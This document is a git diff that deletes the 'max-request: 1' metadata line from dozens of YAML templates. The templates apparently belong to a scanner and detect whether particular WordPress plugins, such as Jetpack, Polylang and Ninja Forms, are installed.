diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
-    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
